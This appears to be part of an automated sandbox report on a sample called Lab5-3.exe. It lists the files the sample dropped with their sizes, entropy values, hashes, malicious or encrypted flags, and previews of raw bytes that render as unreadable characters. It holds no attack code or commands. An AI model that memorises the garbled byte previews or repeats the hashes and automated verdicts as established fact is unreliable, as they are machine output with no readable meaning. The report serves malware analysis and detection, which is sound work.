                                                                                                          SHA-256:A20CCE0D5D214E4448702D2FBD5D7709A78B6403DE0BB78EBC520F232699A15F
                                                                                                          SHA-512:C86106DC6638EC15EA5D9288378F549034434B85FFE3D9D7E72A9FCED92D2D37BD89142F9F591EA6B66A53857FB3DD3DF197C989CD2E1171EA2D5E65C3FFC3CD
                                                                                                          Malicious:false
                                                                                                          Preview:.OUo..:T...l..;..T......}..[lM.U. .....5 ..70o..H ,...P.ZQ6.iP.J...Y-.~U.V.oy.I....rH....wC.C..\..Z.sV&N...0..V...M.....@...n.D}...b0G..(...to..|v!.(.@.....}.Et....S .M.U...P_,...vw....\m..&.l.{.?.....8.'(...3[}^!.........:]....-.RH....@,0..3..JF4.......c......z...Y.&..?..I.mN..":RD.q.*...1>2......;1.N.u.-..U.......C..40..lBy....).YR........3O...a.!.^.H..J..M.j....R.p.~..O...zt.h.Pa.4.......y.l.k.....G.G.`..t...K=~;Y-..>x.).F..w.-.M.4q&.....a.....v"H2..W..I.............z.....7.....g...sP...f..!......P%F{G....dr=pI.mV'G-6.H.0.j.t.#...zZ..#J:.q....@.....?.r....@....b0.1..T.Pm1..WF.E......hi..^T..@7...jH..9.f*Bn.W.g.<.....#,..=...S.E.4./....ukp)...p..........Hl.CzL.<...#..f........~.....}.Q.z.s....s..?.P..S..l.ce..k..q.V..*...^...2...c5<#...w..ta...sjj.B.a..N..F...G..U......plE..b...M..2...+.....k.@Lt....E.t>.S^.J..a..'..5./UL.@....,.pA.d..:..t.Ia.a..-...4=.N.r2....p....^V]*@.Z..^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.912021104600669
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0Occ7NUJRMVNc6eCs2wnZipAWKHfUTid3hBaUoSGFcmeykEdEElU92i:0OckNUJRM7eEAWlGx0uKeY2ElUJ
                                                                                                          MD5:A105ECA895A2B190F410878FA6D00BCC
                                                                                                          SHA1:FC64DFF22D1157C3235B4B2AF466CA7491686DFB
                                                                                                          SHA-256:7C0FBC2EAA21F52AD6CB5E131CC4A18A9BA4F7ADBB031CA21B0A9D85A2AC0CB0
                                                                                                          SHA-512:5F0722C41644F6DFF597EABC4CBC73F474160E15F8AA22EB28AD040CA62EDDAF48C61144D283FE851C1AA1F9441C94EFC48FC879E607EFCC5432A49E9C2A1854
                                                                                                          Malicious:false
                                                                                                          Preview:....wU.Tb?$..%..m7...U.........h....Hm.....kj0...&-Au.V...e.b...1.&{[\;_J[0..M.`\.[...5f&.m........J...OJ....l.....:.*.y:...U..W.......O..3...........L.B.G.[..6JXM...I....h..u.#.2M....)p.4......K.h{w=B.Q.({...k.B.K.>......0s.tAB.;..U.k[a..h.H....c~.... q.D.:0..M.v....=..F.B.....B.\.|z.....P.N.{z$......hE".jP..b.....Z/.v#.H;...p .._..v........."..^...t.._.*l..t&.P..$.....7>.G.9......g'2.Z..v...AA...T.:=....br2.MmYy..o*E........F.RN.....X`U.(....}u..+...j.&.e..RB,O.zx.:^....6ha].$.W[.?..~0.,7..w...H.....u..=...5.J.,....Wt.......6 A..e._....xn&..O.T.....j.a.]....f....Qr....-.&..z.c.G.k...wZ.Hq.E......'c~..Ji%w&&'$r...mi..tmf.w2(.)....V..-..".......*C.iY....X...B.{'%...6!.1a....1}...c...(8Z..H....*q;@.CBq.z.....5. ....,?.!%......o..y~=&[....N.....\z.5...u.f...8e.P.._.p.Aht.r...;,.=.$#.V..M...eP.....S.4..3......i.=....M.kC...ex2.....z......E.s...T.)....o..).[.sp...k...[$...?U.#n..^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36272
                                                                                                          Entropy (8bit):7.994928421360108
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:3baT27gTR/6+K9WkZ7SvQ452cG5lS1umPIPx6dYOPpUHJdkYZ:Ce6C+AtZ722cKmQJQPpUHcYZ
                                                                                                          MD5:E5DE37C7BF50C98C95411E8B377FF1D5
                                                                                                          SHA1:DDA4152DD93F46D02D273F4FBDE18B28619297B2
                                                                                                          SHA-256:47F74C22D7D7B5DC4D6D693080D32702C92C309B42B3BD9596B014DEBFF70A58
                                                                                                          SHA-512:BF2D9F9CAD0C291FEB4D55C80F5360052144CECB557D7AF8AC2F1CBD8F6BC1CFFA705CF1BCD2EE9E8755EAEAE651E1F9AB4AB42533DCF01E90ED35080532D411
                                                                                                          Malicious:true
                                                                                                          Preview:._/..C..... ....nW.8.....G....!de.h..R..#..h.5.S.3X.BV..TO.i.8.)......'..E....n.d...h....o..".U]..GAy..L..W?.5#..Tq4..^.%u......9..b:$.}....g....5..</J.l.|.....L...x.D.Q.[.%*S.U...e....YMRi1s%k.f.q....u...4.;....n....U9..;.UA...Tp.J...`..Q.......W2..xU.k.<\.EQUr.........I.m.. ..`:n.!.&.n.=NA.&......u...vo&p.>...z...X.K:.[.Z.B);^..u.t......=w.....f/.1.Z.._...'.z".1Qo..W.nh..]. .w4...1....6..L.7.#.]...q......4..~}2T..F....(.a..l#...1K.i.0._..I....Rv.X0WY....P...1.T,.(..j...u;.=."...^..~2L._.)V..`...~....Q"...0.7g.).Q....|kp..x.._.9.o...q..O.cN..a.'...j......S......x......l.....'.G....V.".%..#.o....b.#.XS...Q[....E..(S..v..i=XVP%.D.ku....^...>..=F9..&.S..N4.pp....(.rk.......R.b@....&.....B.....4(NW.5.l....vs[nh..`e.)Nm.>2.........h....y|Nv:nY......-P qQ...R..~....#.8.b#.\.......4......s.Q....,....).G\.j......g...k........@r....8.z.3..<.'<.|k)C/.0D....J.l...0....|..$..s.!...,...6E......5"..;.}#....&(..n!Jv.M)...sfS....x.9..e..#. ....i...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15280
                                                                                                          Entropy (8bit):7.988670508515769
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1KmpKuhYlMkYJAR9/IpUD1HkCdJxzxkecIcpvueC74iL13On6l1AMmLPCTNg2Thj:1UgI93pEqKlzPgROnuAMmLC2m8Qtb
                                                                                                          MD5:435403FA87F3B1BD1A3845D56D038AE7
                                                                                                          SHA1:0040367309DF20F8640C9F38965670B9F3555EA9
                                                                                                          SHA-256:F97FBE74F7E94415B5DAF09BAC266BD7D74DDCCBC9D823B21BBA99178D05F7A5
                                                                                                          SHA-512:A11A2A6E6C099377EB7DA43C0D25571422DF50B13C258C5C02FA489DD0AF3F5E03528001B1D010C6C89CB5565EE2FD59AFD5C0A48CE814F9F0D7CA39A429137B
                                                                                                          Malicious:false
                                                                                                          Preview:.c...V....@...=..?.H..-...L....}.Ty...'.......2.U.%..RI%rm.....L...%."...(z.....r...C.d.....9....K.B.$`.k.\P.y5...".W....n............,..a%.Q..(6 M_R@+.......Cz...H..z..pM.s.X(..qf^d....~..;1.UeN./.kX_R.I+.8.+N@$.N....r..9....O?......U....Qx..t...<.r..."...he......0}LK....n...,...X%.l`.JKS?........3i..f...`.'9Zp..z.LM.."f.0.RT..o..s.....~.~..CD........c.X...T.i.t.7T....9..;/..x...,g.F..O;.".4...t.a...4......"....?.r.I_.r..}Mb...B.*\..W....].....<...zo...k..o+8~....P.V.#.X..{a.D..3.6>y.].G'w..hpg<.....^......&.\...W........\0.. :.....r..DQ.U.b..|@.....q.].L.`e.A....&@........*.9..D.a.V^....`...B...+o..C.19.a.s........~C....wcM.S*.T.#...uO...)...4.d..'...x)...X..&....w...X."x..4.p.....r..Wf.=VrZ..*...E6.0./aG0Y...WI.."....;1...$..#...cD.a........R'.P........3b-.c...FZ.3L..7K..!^..x_......a..5.......%pL.u..'...dVxr...eW..".,..?}) ....Q.R...h.6A....B..g......8.....g......b..g.u.l.4......2#w..YKX.x...&_.......z.......l.l...L.0....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):216064
                                                                                                          Entropy (8bit):7.999113519206007
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:pW3l97ejRHqDZbEjKoS6tBE+fCPnj4OyI8EZFKZDXZ:pIeQ6+o0Ph85xJ
                                                                                                          MD5:CF8056C85357362DE0175DDA40136A46
                                                                                                          SHA1:91D4A0DEBD9955E221CFB28D1441612C0B9A9684
                                                                                                          SHA-256:D465D8E0B3E0123E54C30D3EB42C0D5161012E17DFA88C8C41E0639EEC111317
                                                                                                          SHA-512:483A171AA55E151CA05A9B128FB9489AEA8FB2A29052841CA0FF4C6D9817C69D7DBDF4F48CAB717C61C5125E103445E164898B29DEA73076DE9535E677E84582
                                                                                                          Malicious:true
                                                                                                          Preview:a.....kA.@t..d.f...&......pl(..4..'.c...'F*..Yq..%.E..u.....N_..|.D..............+..o.W.9...n..IPs...a.....otz..J...q.p.O,.A.....RX.}ttYf@h./+........w.s_...=...$........z..F.m&.X8..D..".d..?[.|.7..]..B...>...\R...%....Y....E=Ceq..Z.l..cI.8W.....Cx.].5[$...0R..%.}..>....p....*.?1.c....=g...M.....5....t.9.......9.......;.ol!.R....B.Cg......:u.W.V4.l.w...r)....e.@...C...(E..:......D..WK..Q.WMq..NgDZ.V$......K.i".e..qo...~....0.........J.:..@2......v......BNO'..?.h.zk.|~g.....^R...3,.E.'......X.?.....TnZ@..y..XHW..M..........(.ZX.d.6.D.......&..........<..-...4...\.sk.V&..:..0CP....e.d.,D.5....@bk..>.X.y.v......./Z.U....u.q.......O6t.h...f.T.......K.S.`..0..g...M.....0v.Do...~|..}.F...&....H..s0`p..\...).^m..H..?A.[.F.v=.u..^.v.6....N..t.>.....J....&..J.t.... ..]v.$.6.k..[.k....ztl.T~'..?c....{..-.Z#.8......&e."..;......JYI#;...e...rx...q..'.jN..z.5.)..h.....^..M{....].h.. W....*5K......8y5.^..3..\....|...|H*.w....m...............(.!.Tf...1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12304
                                                                                                          Entropy (8bit):7.983417552838546
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:vylHjSqvv1p5Nbixk89c8r1ICeegoYHXkXIf78K02aWnROa9foE50Cb:S+9ATkX+45WTfT5tb
                                                                                                          MD5:4CC4D2BBCEF61E3DB313FB7802821E63
                                                                                                          SHA1:103CFCA9CFA0FCB7EABDAD7C838117905C69EEC6
                                                                                                          SHA-256:C4BB8A14DA126116AB744D0C98710AA661B8299ABD464DF8C934E97B1534E46F
                                                                                                          SHA-512:5319F0C272DBE966389C091541E32EF35B533F2A1C16140ACC2146C6331E3C34DF00A81239DECFA7D57B0E88596431547C4C4037E20DFCD2C92F096708C7DC49
                                                                                                          Malicious:false
                                                                                                          Preview:C..o....}.C;A..w;.....W..x.1 '0..K.m..2=..k....8V.=..D.......2Y=R.......N.6;O...C..2...a.ty.OL...y...7..%.uf.)-.<P..N...t:.%.x....\...Y....g.2r..&"N_,p\....Kuh...c...._he.....s..Rr.)...P......_.^..F.~3..&......UR........5.7y..}..lj{..n.s^^.e.g%.5;V.S.i.....,...O...~.....H...H`.?....-2W.\..*........g..-.....+..J&..P.|.b.3...(....5G....V|.e...V......h..c..b`c.|r6....]..s..|.6..}..2......Ey.C.V.2.*.&4W....#"....6.....a....~..Uf..I ...*..fEy....T...f..N:..0.+......o..D..uU..6. .......].L..9\.[.F..EJ...b......,>...(x ..u;..{......Z...&.-..8..^... t..+.c.'LI.BzeHg..'W.rv..qY....[.E/.e....5..v..[|T..C.].i."..c4......YO.*.$N%(.9.$.~.~.|r.XY..i+.>>g.W...H..dm.....Z)&._....U..Z..\..b.z.7t(..Qf...@.e.....L..I....=^.~3...E......V...i.......\..E|p...uq......,..I+.c.......Ae..#Q&.7;...fi..-=.y..(..x1.w...$........u.\=....j+......bV.Z..d..K?....O.H.........0B...b.l..|..u...T.3.....:........R.. =T...#..7q..D."{ip.r...4.@c.pM.a.*hCQ.u.W..k...a.8..C....>..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13856
                                                                                                          Entropy (8bit):7.986367189565428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:GynO2c/1Dzsf73YVrZ/gsGFIKoDmhMttb:h7gSL8esBChWZ
                                                                                                          MD5:5BD6CE20E114B0CF5827452B9DB1F904
                                                                                                          SHA1:F28165E8BF294EC806857FE90437F2629D25A269
                                                                                                          SHA-256:9884B9DC84C2FD7784EF6E1875F4630A0872F1DF32F61CEA892D7E58A4CD39DB
                                                                                                          SHA-512:74506C1ACEEE794F4C6488E0AA702EC494DEB7CF37580416CE2D413063F018ACA566584D4CD1F69C77C03B9BE874C3880DBC06EB38D807FBEC9C56DBC33918B1
                                                                                                          Malicious:false
                                                                                                          Preview:6..Z.]..F.]....^K....M...G.P!t.....L<#...ex..W...=6{Csi..U-.6..b.#..i...'Z..|.TBQ.?.x.%.e...6.#ej7.`]...g;_}k....P...$...G..E[_...N.....en-_:t............`..o8...7..V......Y.n..)...C....YT.(...E.1...d..N.#.6..;L..v.(.8..?...y....0.....g.R3z.g;....:..v. ...:.i..K.[..1^........dF........K.q.S....).'.#...!.d.d.r......X.,>...Ds...(.0|(.2z.&.T..8]....3v.....`..w...i=...#e.Fy.....l_...k...0...t.&.9......L.5.h...xRyau..}...UC8.r|K..i.V...........,C...%.Z.#c?...U..-%...D.8......E1.#-.qb/.B.Y....J..J0.j..^.A.8.g......S...>...."..,.....}.H).,..1...>..S.x1..Q.F.F^.v...E}..Y..a.$.^.Y.F..~.. .#..z....H.[jz..%h.._..v!..0X......m..../....R.~.S./.o......[5&.SK.....7.n$..H............uu........8...mO... .<...r..?....i%.0G;.....4.(E8.}.3F_C.-.5g.G..0~k . .....]p.^...l...u/..{@.j..(Qk.w..E.0.+_H..g.p...9H.....g=>.C....b..)D.u.gq:XT.M~T.6I\Bk).O..m...E.D'..W.b.6^..).A<...|{}..vR...6N.X(.g_b..sC@..v?xQ? .N....k...^........v.~..+n*..X.B......{.....LL..b..4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14480
                                                                                                          Entropy (8bit):7.9865845620308376
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:VeHzXlxxiejhP9B/WU0sHP+UYxn4SLppiZJbJw+MDHtb:AJKCVvOU0SYx4oUnbJJ+HZ
                                                                                                          MD5:A4D1C8ECEE639D06B7C54BC98C5A13AD
                                                                                                          SHA1:156B24A3AE2503248A3D9BCCD90769131C0D5D7A
                                                                                                          SHA-256:7E15B28AB22BDAE6B36E6684D81AEF72B96D94A52A56DC47AA30FBE793D42B47
                                                                                                          SHA-512:D88B0F974FC9886B86EB8EB64C661992147881C3344463B13919845836BCDEC5A9ADD2CBB579C9DC3726923FBE464B18B2579463D78FB6306209B069DA0E0FAC
                                                                                                          Malicious:false
                                                                                                          Preview:..84}..6.$...pK<B...S.1..d.L.!:]..f...T.B......&...dn...AYbh.v.R.s......oC.....L..)......&l....E.B..sl!....4.Yg..dn}.h..p|z......Ji.!`Yk.}+.Nf.=..v...4.Z.(..Y..V.).\l7,......iY...=0.......i.[.Ob.R.k......r...o....G...V?IXx...n+..*.H`...fD..B..K..._.9R..n..+l....y.T..E.....HU.B=..bY;....-.W].{.kV..%@.z.f`,.. .............c.(U.h.u.....Y)b~...!...YR..;KH.h.....j.M.V@...D........=..4.Z..UdQ.(5....X....:.v...$b......5..?l...h..*..z.U..K.?..~..vJa...vY..Az.h..../.6i..L..'1.7........<.(F.P1!.c...Q..9.e}....... %..(..........U...$.....$..).DG..F...Y.....c..E.......2..._T.S.1..Q.....AfM.fb....$.x.._$.Q.!..8.t,s..U..u..L.....6.|.Q.{h.7./......?.3.?..l.t*,...?Bq.4.L.. sb......}~),..z9Q.-0...>..^.@|c...E....O.H.& +H...]).VB..v?.0y..%..&.y|j.9..2.{............d..L.">7\L.....g...?s...zG.]s.w.+H[.xr....@j....q.Gn...hi3...P...#.YQt)M........,K..T.&t.`$[.i.._../.7..'..W....H...U....L."g.Y._..D..S.2.../.].....k.1 {..LqUYLx.N......g..I..{......8../v.4...o..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):7.992168655667448
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:jeeOocWd0cbRWCyx93Z3xX+WsicbZI7kaqy+NWuZ/IVscf+ZBtb:jeeOlWfbRB+9J3xX7GK7kdzsusFf+bZ
                                                                                                          MD5:827CD7C866BF381CC4C2E60C63A302E2
                                                                                                          SHA1:7C5FB3668299E53B842B20671476713A2B0D2471
                                                                                                          SHA-256:C8884008C3BBDE2EAD6ECFA8662BDFDCF38869DC36713CBA3EBE546423C77287
                                                                                                          SHA-512:E4C45F36FC4CA9FC41B7166C2157FC76B95C734741C0CA87A2A5DD582577D0B5578D1ED9770801CF0B67B7A4B799B04DC4F6AEA954D38F1F4E5F7DDA91917BA5
                                                                                                          Malicious:true
                                                                                                          Preview:\@...<!<M...sz.[......[........TF:Z.?......I`.'M....4.x.....>.Y..uc..l8......Qg.N....MST.F..W...A....%..l.J..@n..=J.'....t..@...|.!j.W..V^n+..i^{0;.!......O..-........U|..x...^.mFx.yhm..I....?].(...@]Df..R.....!lg..x..q.D.....W........y.nx.6....Z.....f.&..[..G..\..E]b=.s....e..gAc^....10*5...]........S.EIr$..jgJ...F...w.,...5....2X...U....,xs...aE.l.ukp...."..f...C.T.q..o]...x..GL.......,..*.G.B...b....'-..[..8.{im..&].....YP....^ic.<tV..B..h..S....}>*...(.dr1a..."E.'..\..]F.L..z..E....%.6..!'z...-U.%.......:.\.X....](E...T.^..R...b..E........r..<.n...3o..G...1Q.Zx.0Z.^..n0....$.t....0......+T,..|....':.&_Z(.6)L'(.d,n......T..c...{gp.So,...kOW...3f.v..cU3"b.<.K..\..(,2.t[.W.Yk. .<*..;..}hrm^n1....>...y.".I,\<....lY.RR.}..^...2.........."..f88....`...S.%.......1......wR..C....2.P.x~.Gi.0...'1...!$..#M.y..........V........;...w...V..M Q./....s....U0E=M..8.?.n?Fq(.t.(.a.d.<O.h......].]s..G.U..2]...=].....M;.GAo..9.:.&=/...........p..1.,.VC..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1984
                                                                                                          Entropy (8bit):7.899340845195699
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DIzWzSY4iyyRLcHfUTid3hBaUoSGFcmeykEdEElU92i:ckA5ypbGx0uKeY2ElUJ
                                                                                                          MD5:E5A434EAE0F2CFC58F7C589D9C19F80C
                                                                                                          SHA1:A4129467E88B5CA591A2685B1020ED59FC8BFEB6
                                                                                                          SHA-256:AA672A981A1476A2EB7A21CCC623441BB872982F4779655491C676236D3DF4C4
                                                                                                          SHA-512:6229C59D747AEA5075DA3506760EA2A209C4C953CE247C709CB928DDEC791185DB2231D3146DB7F982055E55BC2A5C126CC40E7F57D8A34C35AF1055F06B27DB
                                                                                                          Malicious:false
                                                                                                          Preview:....@IB.,w.....:.c%!./.)g.......v......U.;@j:....._.`.<. .M...|Le..N...O.F.e...B....>6.......+rI...L...6..w< .&T...[7]g..aRS..w.....G........+.....(.xqs.._i...{.2#...N .+5..^@.,.5.l.......5.......</.).Yv.."T..Y.....A....}.4.\....8....S.......j....>...?.6&!.F....Z..e~......~.P5.wB.....)E.m.o.m.N..J#...c.........M....._.fW....UO.Y...Q.~...K.....?...Tk....5.s\..E...Z. ......+..O.oYM......y../...n6'6./...Y.........2.c{....<X.g...,.l].2..Up.;....S...Q.Ul..~..q.(.p..&.j..H.Q.n&....T9_.$.E!<..&N...t..[...=.....0}.f..2<...;.uM.....s.....|.....u.5..p..(.0O.eY.=Y....Ar.#.2=q&f.....[.|:.[...w\~.$..;.....6.0...;Gm.e. .._"I...L...;]..kK...bS.&........j.9c...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.889093068543723
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5c8p2VHfUTid3hBaUoSGFcmeykEdEElU92i:G8pPGx0uKeY2ElUJ
                                                                                                          MD5:7669341725C7AC834C5BB22FB7EF9A2E
                                                                                                          SHA1:70D9430B70766F4D1A5A91ADE0601C904B69157C
                                                                                                          SHA-256:D0DA489D3C019C0B0C60B542197BD3FD3A4AEA9EF51E73B6B4A5B01089E62AD1
                                                                                                          SHA-512:41E04E86E596A3982224132CA59F4A301FB0CE377980C191CDF8D83E01247F6AC97D25F683F1F406D296447C453C192A244E48C3B25D51F965CAE06CF43B04BF
                                                                                                          Malicious:false
                                                                                                          Preview:&.ot~.t.k...W.]...mD...*.;.m.Z........C4?DZ......,I}.+dG..;|...&o..:...0.....Q...Xo....................0..#...n......X.X..T>....8..i.....8..d.}.Kj..pn..f....t.%.53 .m..}..T.L.J..y...:...:.%..6.:#q<.l...........#w...W...YF~is.4U...*.x!]...+1...[NDj.....%G4...r.a._...[...G..}.f....V..u..-.$..?q..........do...S.~3....].s..k.S.BS..V..L......3$eR....>..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.918830744953195
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KUVfNBAWBhALA/mrWzHfUTid3hBaUoSGFcmeykEdEElU92i:VQWBhsrWAGx0uKeY2ElUJ
                                                                                                          MD5:8528B88E995E9CCD12C0BDE578441D9C
                                                                                                          SHA1:7563BEAC78AF3238E47C7AEA6927BAA305A907AC
                                                                                                          SHA-256:226CF2F4EFAF99145ECDE0D9ABB6CD4DF496B5EF2E0DE7E3F2C465FA2FA03D61
                                                                                                          SHA-512:C1C54AAA689543CFA991A344201F9B79E60CA57B2F6DBAB121E316F724B88DC12B0E0F6771C6ADA34BE0B5681A6BF944629F2B66D8AB75C74E948492D8202150
                                                                                                          Malicious:false
                                                                                                          Preview:Z..[.F..]q..>.NT...g..&..FSc.3n...........U.gt...C...6B...&..8...#*-.5..R.\EHp.^..p.awt.g..|R}...Yb..zIB.L.<.Fi.Mf......$......?...G...v....[..a.m...9.`..AXR.4.......,o.#._.....d..&L.W...2-0*6\g..R{EB...'.\=....7...4U....la.../..6~Dd&........X..s....=%v....f.ta.(....<#.<..5.T...*...V.......s2.3....Nt 6.fb..........^&Rm*.ym..4LvS./.. .`.[.......}..Pz.2?I.x.R........:.6D.d..o..@A...........8.`>.o..[....$..J.....d&...[..h^p..Q[F2.l.\.]r.9GL7........W.#.j....,R:..)m....K...}..$e>&.)..<Bj..yM"Tv!.S...`[.W!.."e1k.|8..!.n.qU.>..X:......x.A...........^@.q.9.O.A./....+>c.QU.(.$..(.....o.S..".N$......8..-DuM.T.>.&...... ..!....Ge..f.......-....X....se....B.v..P.cr..k..P.ag.H.....Q.(..Y.8R...}7.o.H6.q...8.......sg.U.^{.1`.N.#j...k.n1........vu.pY.4..B.g.E.H....1.[.J.m.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.938034788155932
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IuXzsJgSJ9Tt8PCv7tVym0S3RBh5Z8BI/3QL1vEA0mjjHfUTid3hBaUoSGFcmeyS:IYsauTt86Dqm0SBlGSgKA0iwGx0uKeYO
                                                                                                          MD5:804B41C741E964AE5C65B8829CC8E7D0
                                                                                                          SHA1:81C7CC1F55A64E8059A1F1DB6EB777C36567001D
                                                                                                          SHA-256:595FD690CA110E31D52121733E4B88DE0A8DBCF014F9A03E0813233A6C8CCE34
                                                                                                          SHA-512:E772F72F7F6C4D31236DC796A9046AA6BE38941950AC05FCE756FB1CE6835EDBD51AAA7CCF2179E573F00C777413653FE71F69847D4B441F096855B87F0F4785
                                                                                                          Malicious:false
                                                                                                          Preview:......P...-.^.V-Y+_}.IC.A....zic....@..v..V}.9.#...5...\...r.^...S..|.fK..\mb.......g..s..F..N..C2...}..0..[.>.Z....i....<c]..A....<]..|..>Mi..@...g...C.-.Y.=M..s....)..h..#?_.H....A.._j..o,[)oV..._4<....<m_.u.x..Yqk.'...B.H..0..y....[Pm...NrZ...4.A[w....6i...u.......:.V....2.ts.Y..3.J}....S6.D......F.b....z......1..&\.p.Q.hVJ8......T..:(q.c...............@..).D..I..Z.3..r..../.O....f...%..'...w.N.......G6z.?..c.0b.....C=b.....b.....3..#eh....NDfI.u.BL-..P...g.T...p....NjsF..z..IH...0Tne1^..~e2..0'...........9.....y'qN..! .....k)U{;..r$...\:#.oO.84.Y..r.....}QB ..o..Eg....Et.[.)a.izNq...&..V]3..d...F.(c...._..K.PHq.\..)Q....m.}.G6.)|......L...sC.....%.v..<......dG}.....%(p.@.@'.3.<...{au?.4.Q.B/.*..4O.'.*.R.*v].5.. .......djpG.>.~R.7.&0...........R...A'q...M*......=.z.H..k..!H.;..|..f........4+./#...'..}.....F/.7.....c^0"..l.....BNi.<..3;..=.......R.ui.a.....QC..}..$).@....".~.|..1S.rr.._A..sm.i^<..._].D....\.Uz..y......&0...d.pv........p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:COM executable for DOS
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.931408724581328
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hxL2kwLzDxZLmRGOsdusVr/nTjXHPPmQ4Ouqb/hk8ZkkXAHfUTid3hBaUoSGFcmk:hxL+rLGOusVr/Tbh4Ou8NGx0uKeY2Elk
                                                                                                          MD5:F16A4A462E62EA542D6EF5261DCC1415
                                                                                                          SHA1:6841C506F85D495693F7388473A9A521706BD100
                                                                                                          SHA-256:2152D97383989ABB88656EB525874FD60B16C88D869D1717811B79DC8A2B7902
                                                                                                          SHA-512:3AA86FCEC277136A3ED6E9558FBEAD7D3549D6098888389D5F2E71EFC32E4E783FA1FCD42C5A6C10FD31DFE1139A13A330624857D0FBEC70BD2E74BE16877C42
                                                                                                          Malicious:false
                                                                                                          Preview:..,.C....*L...k..g......{07.RH.*..2X.zE#/W>...X.. $B.k&D.l].. Bm.U..yjQ.`...........['.2^...9..i...{s...8McC#...3......yo...Q&.I3Ju...4M..Y./......(..`.;.2N7.......o>.=-.B....YU..sD..!&OA.....W....%DM..R.(.B.d.ZQ............dv.H.......(V....OM....~m;....0.I..W".\..R....8.....-..iE..T..\.h..........{k3.j..&.!'.u...3.<...'.2...+z..Q..3.f.M......U..4.....S.....a...\..R3..a.N.C.wQC.@3x....(..-lT[e]\.y......^-..Y .uhm...rT... Fj.r.oO9x..+t..8..0.....s..a...B.G.$.g.).s..z.....@.qa.m.J..5....'...P..!..7..\........._5[.q..{....p..D\..H......s..o.....r.....i.L....X@....g....CEZ.......'.<(..~..\e..q&..l...S._..Q......J2.TQV)...[...90.U.e.82...z..k....^M'..!...\.d...(.~..<..<AYt1..l..,s)y.u...t.A.^.'..ko..LTb..?........7!mQ.A.=...k8xK@T).........*L.'..a|...u!.Y...8.W.~...U.@.5.U....j.+G...B.k...2..U.4...t...}....QAz..D.".eU...g8.3.1Eb.....Y. F....T`X.f..!...&~A2..Q_n.....^.Q.~.......D......O@..).....L..u.#...;...../q......:.....0L.`p8.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1792
                                                                                                          Entropy (8bit):7.895491129995102
                                                                                                          Encrypted:false
